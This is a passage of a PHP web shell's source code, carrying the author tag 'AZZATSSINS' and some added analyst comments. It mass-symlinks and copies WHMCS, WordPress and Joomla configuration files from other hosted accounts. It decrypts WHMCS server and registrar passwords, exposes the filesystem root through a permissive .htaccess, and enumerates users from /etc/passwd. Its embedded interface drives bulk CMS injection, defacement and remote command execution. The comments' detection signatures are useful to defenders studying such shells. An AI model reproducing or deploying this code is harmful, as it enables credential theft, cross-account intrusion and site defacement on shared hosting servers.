  2128. symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  2129. symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  2130. symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  2131. symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  2132. symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  2133. symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  2134. symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  2135. symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  2136. symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  2137. symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  2138. symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  2139. symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  2140. symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  2141. symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  2142. symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  2143. symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  2144. symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  2145. symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  2146. symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  2147. symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  2148. symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  2149. symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  2150. symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  2151. symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  2152. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  2153. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  2154. symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  2155. symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  2156. symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  2157. symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  2158. symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  2159. symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  2160. symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  2161. symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  2162. symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  2163. symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  2164. symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  2165. symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  2166. symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  2167. symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  2168. symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  2169. symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  2170. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  2171. symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  2172. symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  2173.  
  2174. symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  2175. symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  2176. symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  2177. symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  2178. symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  2179. symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  2180. symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  2181. symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  2182. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  2183. symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  2184. symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  2185. symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  2186. symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  2187. symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  2188. copy('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  2189. copy('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  2190. copy('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  2191. copy('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  2192. copy('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  2193. copy('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  2194. copy('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  2195. copy('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  2196. copy('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  2197. copy('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  2198. copy('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  2199. copy('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  2200. copy('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  2201. copy('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  2202. copy('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  2203. copy('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  2204. copy('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  2205. copy('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  2206. copy('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  2207. copy('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  2208. copy('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  2209. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  2210. copy('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  2211. copy('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  2212. copy('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  2213. copy('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  2214. copy('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  2215. copy('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  2216. copy('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  2217. copy('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  2218. copy('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  2219. symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  2220. symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  2221. symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  2222. symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  2223. symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  2224. symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  2225. symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  2226. symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  2227. symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  2228. symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  2229. symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  2230. symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  2231. symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  2232. symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  2233. symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  2234. symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  2235. symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  2236. /*You Can ReCoded But Don't Change ©CopyRight*/
  2237. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  2238. symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  2239. symlink('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  2240. symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  2241. symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  2242. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  2243. symlink('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  2244. symlink('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  2245. symlink('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  2246. symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  2247. symlink('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  2248. symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  2249. symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  2250. symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  2251. symlink('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  2252. }
  2253. echo '<center><i><b><a href='.$folfig.'>CLICK IN HERE TO VIEW CONFIGS</a></b></i></center>';
  2254. }
  2255. }
  2256. elseif(isset($_GET['whmcs']) && ($_GET['whmcs'] == 'decode'))
  2257. {  
  2258. ?>
  2259. <form action="?whmcs=decode" method="post">
  2260.  
  2261. <?php
  2262.  
/**
 * Decrypts a WHMCS-encrypted database field (the tblservers.password and
 * tblregistrars.value columns read below) using the installation's
 * cc_encryption_hash.
 *
 * The scheme, exactly as implemented here:
 *   key        = md5(md5(hash)) . md5(hash)          -- 64 hex characters
 *   hash_key   = _hash(key)                          -- raw digest bytes (20 with sha1)
 *   blob       = base64_decode(string)
 *   iv         = blob[0 .. hash_length) XOR hash_key
 *   plaintext  = XOR of the remaining blob bytes with a running key that
 *                starts as iv and is re-derived every hash_length bytes as
 *                _hash(key . previous plaintext block)
 *
 * Analyst notes: there is no authentication tag or padding check anywhere in
 * this routine, so a wrong cc_encryption_hash does not fail — it silently
 * yields garbage bytes. In this file the hash comes straight from a POST
 * field and the result is echoed into the page, i.e. this is the
 * "decode harvested WHMCS credentials" step of the shell.
 *
 * @param string $string             base64 ciphertext as stored in the database
 * @param string $cc_encryption_hash the WHMCS cc_encryption_hash (collected by the form below)
 * @return string decrypted bytes (binary-safe, unvalidated)
 */
function decrypt ($string,$cc_encryption_hash)
{
    // Master key derived from the installation secret.
    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    // Block size of the stream: 20 bytes with sha1, 16 if _hash() fell back to md5.
    $hash_length = strlen ($hash_key);
    $string = base64_decode ($string);
    // The first hash_length bytes of the blob carry the masked IV; the rest is ciphertext.
    // NOTE(review): nothing checks that the blob is at least hash_length bytes long;
    // a short or non-base64 input presumably reads past the end and produces junk — confirm.
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    // Unmask the IV byte-wise with the key digest.
    while ($c < $hash_length)
    {
        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
        ++$c;
    }
    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
        // At every block boundary the key is rolled forward from the
        // previous hash_length bytes of recovered plaintext.
        if (($c != 0 AND $c % $hash_length == 0))
        {
            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
        }
        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
        ++$c;
    }
    return $out;
}
  2291.  
/**
 * Raw (binary) digest helper used by decrypt(): sha1 of $string when that
 * function exists (20 bytes), otherwise md5 (16 bytes). The loop below turns
 * the hex digest into bytes two characters at a time, which is the same as
 * sha1($string, true) / md5($string, true).
 *
 * Note: decrypt() takes its stream block size from strlen() of this result,
 * so the md5 fallback would silently change the cipher's block size.
 *
 * @param string $string data to digest
 * @return string raw digest bytes
 */
function _hash ($string)
{
    if (function_exists ('sha1'))
    {
        $hash = sha1 ($string);
    }
    else
    {
        $hash = md5 ($string);
    }
    $out = '';
    $c = 0;
    // Hex pair -> byte; $c advances two hex characters per output byte.
    while ($c < strlen ($hash))
    {
        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
        $c += 2;
    }
    return $out;
}
  2311.  
  2312. echo "
  2313. <br>
  2314.  
  2315. <FORM method='post'>
  2316. <input type='hidden' name='form_action' value='2'>
  2317. <br>
  2318. <table class=tabnet style=width:320px;padding:0 1px;>
  2319. <tr><th colspan=2>WHMCS DECODER</th></tr>
  2320. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  2321. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  2322. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  2323. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  2324. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  2325. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  2326. </table>
  2327. </FORM>
  2328. </center>
  2329. ";
  2330.  
  2331.  if($_POST['form_action'] == 2 )
  2332.  {
  2333.  //include($file);
  2334.  $db_host=($_POST['db_host']);
  2335.  $db_username=($_POST['db_username']);
  2336.  $db_password=($_POST['db_password']);
  2337.  $db_name=($_POST['db_name']);
  2338.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  2339.  
  2340.  
  2341.  
  2342.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  2343.         mysql_select_db($db_name,$link) ;
  2344. $query = mysql_query("SELECT * FROM tblservers");
  2345. while($v = mysql_fetch_array($query)) {
  2346. $ipaddress = $v['ipaddress'];
  2347. $username = $v['username'];
  2348. $type = $v['type'];
  2349. $active = $v['active'];
  2350. $hostname = $v['hostname'];
  2351. echo("<center><table border='1'>");
  2352. $password = decrypt ($v['password'], $cc_encryption_hash);
  2353. echo("<tr><td>Type</td><td>$type</td></tr>");
  2354. echo("<tr><td>Active</td><td>$active</td></tr>");
  2355. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  2356. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  2357. echo("<tr><td>Username</td><td>$username</td></tr>");
  2358. echo("<tr><td>Password</td><td>$password</td></tr>");
  2359.  
  2360. echo "</table><br><br></center>";
  2361. }
  2362.  
  2363.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  2364.         mysql_select_db($db_name,$link) ;
  2365. $query = mysql_query("SELECT * FROM tblregistrars");
  2366. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  2367. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  2368. while($v = mysql_fetch_array($query)) {
  2369. $registrar     = $v['registrar'];
  2370. $setting = $v['setting'];
  2371. $value = decrypt ($v['value'], $cc_encryption_hash);
  2372. if ($value=="") {
  2373. $value=0;
  2374. }
  2375. $password = decrypt ($v['password'], $cc_encryption_hash);
  2376. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  2377. }
  2378. }
  2379. }
// ?sym=link: prepares a symlink-based read of the whole filesystem through
// the web server and lists every hosted domain with its owning account.
if($_GET['sym']=="link"){
@session_start();
@set_time_limit(0);
@ini_set('max_execution_time',0);
// A directory "xazs" beside this script receives an .htaccess that
// (a) enables "Options all", (b) makes Apache hand .php/.html out as plain
// text instead of executing them, and (c) lifts access control
// ("Require None", "Satisfy Any"). Every call is @-suppressed so a failure
// leaves no log line.
@mkdir('xazs',0777);
$sempak  = "Options all \n
DirectoryIndex azzatssins.html \n
AddType text/plain .php \n
AddHandler server-parsed .php \n  
AddType text/plain .html \n
AddHandler txt .html \n
Require None \n
Satisfy Any";
$masuk =@fopen ('xazs/.htaccess','w');
fwrite($masuk ,$sempak);
// The filesystem root is linked into that directory, so any path becomes
// reachable as xazs/azzatssins.txt/<path>, limited only by file permissions.
// Detection: a web-root directory "xazs" holding the directives above, or a
// symlink named azzatssins.txt whose target is "/". Mitigation: keep
// "Options" out of AllowOverride and use SymLinksIfOwnerMatch rather than
// FollowSymLinks.
@symlink('/','xazs/azzatssins.txt');  
$pg = basename(__FILE__);  // assigned but never read in this block


// Domain enumeration: each zone file in /var/named names a hosted domain;
// the owner of /etc/valiases/<domain> gives the account and its home
// directory, which is then offered as a link through the symlink above.
if(is_readable("/var/named")){
echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
<td align="center"> <font color="white"> <b>DOMAINS</b></td>
<td align="center"> <font color="white"> <b>USERS</b></td>
<td align="center"> <font color="white"> <b>SYMLINK</b></center></td>';
$list = scandir("/var/named");
foreach($list as $domain){
// Truthy strpos(): matches ".db" anywhere except at offset 0.
if(strpos($domain,".db")){
@error_reporting(0);
@ini_set('log_errors',0);
@ini_set('error_log',NULL);

$i += 1;  // counter is never read
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo "<tr>
<td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
<td align='center'><font color='white'>".$owner['name']."</td>
<td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
}
}
flush();
flush();
}
echo "</tr></table></div></html>";

}
// ?jumping=user: enumerates local accounts from /etc/passwd and reports
// which other users' ~/public_html directories are readable from this PHP
// worker, pairing each with a domain owned by that user. A readable
// neighbour here means account isolation (home-directory permissions,
// open_basedir) is missing on the host.
if($_GET['jumping']=="user"){
error_reporting(0);
echo '<center><h2><u>Just View Directory Another User, Readable or Not</u></h2><br><hr><br>List of Readable<br><hr><br></center><table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
<td align="center"> <font color="violet"> <b>USERS PATH</b></td>
<td align="center"> <font color="violet"> <b>DOMAINS</b></td>

';
//$us = file_get_contents("/etc/passwd");
$usa = fopen('/etc/passwd','r');
// A "jump" directory with a permissive .htaccess is created, but nothing in
// this block writes into it afterwards; neither handle is ever closed.
// Detection: a web-root directory "jump" containing these directives.
$dir = mkdir('jump', 0777);  // bool result is not used
$rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
$frr = fopen('jump/.htaccess', 'w');

fwrite($frr, $rrrr);
while($us = fgets($usa)){
// NOTE(review): fgets() returns each line with its newline and false at EOF,
// so this "" branch looks unreachable on a normal file — confirm.
if($us==""){
    echo "<font color=red><b>Can't read /etc/passwd</b></font><br><br>";
}
else{
// The username is everything before ":x:" on a passwd line.
preg_match_all('/(.*?):x:/', $us, $user_byk);

    foreach($user_byk[1] as $user){
        $dir1 = "/home/$user/public_html/";
        if(is_readable($dir1)){
           echo "<tr>
<td><i><font color=green>$dir1</font></i></td>";

      // named.conf is re-read from disk for every readable user (loop-invariant work).
      $domainns = file_get_contents("/etc/named.conf");
      if($domainns==""){
        echo "<font color=red><b>Can't read /etc/named.conf</b></font><br><br>";
      }
      else{

      preg_match_all("#/var/named/(.*?).db#", $domainns, $domains);
      // First zone whose /etc/valiases/<domain> owner matches the user is shown.
      foreach($domains[1] as $domain){
       
      $user2 = posix_getpwuid(@fileowner("/etc/valiases/$domain"));
      $user2 = $user2['name'];
      if ($user2=="$user"){
        echo "<td><a class='azzatssins' href='http://".$domain." '><font color=lime>".$domain."</font></td>";
        break;
    }
  }

}
       }
        else{
           // unreadable home directories are silently skipped
        }

   }

}

}

echo "</tr></table>";

}
  2485.  
// Rest of the page body: the shell's AJAX user interface, emitted as one PHP
// string. The embedded jQuery posts back to this same URL with an "ac"
// parameter; the server-side handlers for those actions are not in this
// part of the file. Actions wired up below:
//   ac=browse (path=), ac=ssh (command=), ac=inject (conf=, domain=, cms=,
//   deface_page=, ...), ac=secinfo / sysinfo / phpinfo / chknamed / chkph /
//   chkph2 / safebypass.
// Those POST parameter names, the polled file name "rootinject.tmp", the
// "Deface Page Link" default URL in the Settings box and the
// "[azzatssins@localhost~]#" prompt string are usable as WAF / log-search
// signatures for this shell. The sidebar links ?sym=link, ?symbolic=link,
// ?jumping=user, ?whmcs=decode and ?mysql=connect map to the GET handlers
// in this file; ?config=grabber and ?file=uploader presumably do too but
// their handlers are outside this view.
echo '<div id="tbl" class="tbl" style="display:none;">

<div class="filetable">

<div class="tblcnt" style="width:220px;">Name</div>

<div class="tblcnt" style="width:80px;">Size</div>

<div class="tblcnt" style="width:100px;">Modify</div>

<div class="tblcnt" style="width:100px;">Owner</div>

<div class="tblcnt" style="width:100px;">Permission</div>

<div class="tblcnt" style="width:80px;">Action</div>

</div>

<div id="filest"></div>

<div style="clear:both;"></div>



</div>



<div id="inject" class="tbl" style="display:none;">

<div class="filetable">

<div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>

<div class="tblcnt" style="width:220px;">Sitename</div>

<div class="tblcnt" style="width:160px;">CMS</div>

<div class="tblcnt" style="width:120px;">Status</div>

</div>

<div id="injtbl"></div>

<div style="clear:both;"></div>



</div>



<div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>

<script>



var sidebar = false;

var sidebar2 = false;

function sidebarz(){

$(\'#logo\').hide();

if(sidebar){

$(\'#smnu\').hide();

sidebar = false;

}else{

$(\'#smnu\').show();

sidebar = true;

}

}

function sidebarz2(){

if(sidebar2){

$(\'#smnu2\').hide();

sidebar2 = false;

}else{

$(\'#smnu2\').show();

sidebar2 = true;

}

}



function filebrs(val){

hideAll();

$(\'#status\').html(\'Status: Requesting...\');

$.post("", { ac: "browse", path: val},

function(data) {

$(\'#tbl\').show();

$(\'#status\').html(\'Status: Completed (:\');

$(\'#filest\').html(data);

});

}

function doUpdt(val){

var refreshId = setInterval(function() {

     $("#injtbl").load(\'rootinject.tmp\');

  }, 5000);

  $.ajaxSetup({ cache: false });



hideAll();

$(\'#inject\').show();

$(\'#status\').html(\'Status: Requesting...\');

$.post("", { ac: val},

function(data) {

refreshId = "";

$(\'#sidebar2\').show();

$(\'#status\').html(\'Status: Completed (:\');

$(\'#injtbl\').html(data);

});



}



function hideAll(){

k1 = 0;

k2 = 0;

$(\'#sidebar2\').hide();

$(\'#tbl\').hide();

$(\'#inject\').hide();

$(\'#infobox\').hide();

$(\'#sshbox\').hide();

}



function doReq(val){

hideAll();

$(\'#inject\').show();

$(\'#status\').html(\'Status: Requesting...\');

$.post("", { ac: val},

function(data) {

$(\'#sidebar2\').show();

$(\'#status\').html(\'Status: Completed (:\');

$(\'#injtbl\').html(data);

});

}



function doReq2(val){

hideAll();

$(\'#status\').html(\'Status: Requesting...\');

$.post("", { ac: val},

function(data) {

$(\'#infobox\').show();

$(\'#status\').html(\'Status: Completed (:\');

$(\'#infotxt\').html(data);

});

}



//Js Multi thread post request by Elo (:

var k1 = 1; var k2 = 0; var req_limit = 9;

function doInject(){

var i = 0; var j = 0;

$(\'.conf\').each(function(){

i += 1;

var id = $(this).attr(\'title\');



if(id > k1){

j += 1; k1 += 1;

var link = $(this).attr(\'href\');



var domain = $(\'#inj_dom\' + id).html();

var cms = $(this).html();

doPost2(link,cms,id,domain);

}

if(j > req_limit){return false;}





});

}







function doPost2(link,cmz,id,dmn){

if($(\'#injchk\'+id).is(\':checked\')){

$(\'#inj_status\' + id).html(\'Injecting...\');

$.ajax({

 url: "",

 type: "POST",

 timeout: 60000,

 data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},

 dataType: "text"

}).done(function(msg) {



k2 += 1;



$(\'#inj_status\' + id).html(\'Parse Error\');

$(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});

var res_data = JSON.parse(msg);



if(res_data.status == "success"){

$(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');

$(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});

$(\'#inj_status\' + id).html(\'Success\');

$(\'#injst\' + id).removeClass("conf");



}

else{

if(res_data.status == "error"){

$(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});

$(\'#inj_status\' + id).html(res_data.msg);

$(\'#inj_status\' + id).addClass("injerror");

$(\'#injst\' + id).removeClass("conf");

}else{

$(\'#inj_status\' + id).addClass("injerror");

$(\'#inj_status\' + id).html(\'Unknown\');

$(\'#injst\' + id).removeClass("conf");

}

}

updateInjSts(k2);

if(k1 == k2){doInject();}

}).fail(function(jqXHR, textStatus) {

k2 += 1;

$(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});

$(\'#inj_status\' + id).html(\'Timeout\');

updateInjSts(k2);

if(k1 == k2){doInject();}

});



}else{

k2 += 1;

updateInjSts(k2);

if(k1 == k2){doInject();}

}

}

//Js Multi thread post request by Elo (:

function updateInjSts(k){

var tc = $(\'#sitecount\').val();

if(tc > k){

$(\'#status\').html("Status: " + k + "/" + tc + " Injected");

}else{

$(\'#status\').html("Status: Injection Complete (:");

}

}



function rmvErr(){

$(\'.injerror\').each(function(){

var nano = $(this).parent();

$(nano).remove();

});

}



function rmvSlct(){

$(\'.conf\').each(function(){

var id = $(this).attr(\'title\');

if($(\'#injchk\'+id).is(\':checked\')){

$(\'#inj\' + id).remove();

}

});

}



function retryTimeout(){

k1 = 1; k2 = 0;

doInject();

}



function doSlct(){

$(\'.conf\').each(function(){

var id = $(this).attr(\'title\');

doToggle(id);

});

}



function doToggle(dd){

if($(\'#injchk\'+dd).is(\':checked\')){

$(\'#injc\'+dd).css(\'background-color\',\'red\');

$(\'#injchk\'+dd).attr(\'checked\',false);

}else{

$(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');

$(\'#injchk\'+dd).attr(\'checked\',true);

}

}



function doSSH(){

$(\'#status\').html("Status: Requesting...");

var cmd = $(\'#sshcmd\').val();

$(\'#sshcmd\').val("");

$.post("", { ac: "ssh",command: cmd},

function(data) {

$(\'#sshoutput\').append("[azzatssins@localhost~]# <br />"+data+"<br />");

$(\'#status\').html("Status: Done.");

});

}

</script>



<div class="sshbox" id="sshbox">

<br />

<div id="sshoutput"></div>

